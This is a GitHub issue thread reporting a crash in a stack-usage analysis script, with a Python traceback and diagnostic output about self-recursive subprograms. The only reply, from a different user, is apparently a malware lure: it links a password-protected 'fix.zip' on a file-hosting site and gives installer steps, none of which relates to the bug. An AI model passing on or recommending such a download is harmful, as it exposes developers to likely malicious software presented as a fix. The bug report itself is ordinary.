### ISSUE TITLE
Crash with recursive subprogram that only calls itself

### ISSUE THREAD

**Issue by simonjwright** [simonjwright/stack_usage#2]
```
Traceback (most recent call last):
  File "/Users/simon/Developer/esp32h2_hal/test/stack/../../../stack_usage/stack_usage.py", line 500, in <module>
    main()
  File "/Users/simon/Developer/esp32h2_hal/test/stack/../../../stack_usage/stack_usage.py", line 494, in main
    for row in graphs.usage():
  File "/Users/simon/Developer/esp32h2_hal/test/stack/../../../stack_usage/stack_usage.py", line 177, in usage
    return sorted([(n.replace('__', '.'), self._resolve(n)) for n in names],
  File "/Users/simon/Developer/esp32h2_hal/test/stack/../../../stack_usage/stack_usage.py", line 177, in <listcomp>
    return sorted([(n.replace('__', '.'), self._resolve(n)) for n in names],
  File "/Users/simon/Developer/esp32h2_hal/test/stack/../../../stack_usage/stack_usage.py", line 166, in _resolve
    max_called_stack = max(stacks)
ValueError: max() arg is an empty sequence
```
Further diagnostic output:
```
name: system__img_lllw__impl__set_image_width_unsigned__set_digits.0
called: system__img_lllw__impl__set_image_width_unsigned__set_digits.0
name: system__img_llw__impl__set_image_width_unsigned__set_digits.0
called: system__img_llw__impl__set_image_width_unsigned__set_digits.0
name: system__img_wiu__impl__set_image_width_unsigned__set_digits.0
called: system__img_wiu__impl__set_image_width_unsigned__set_digits.0
```

Can probably fix this as part of a more complete approach to recursion.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
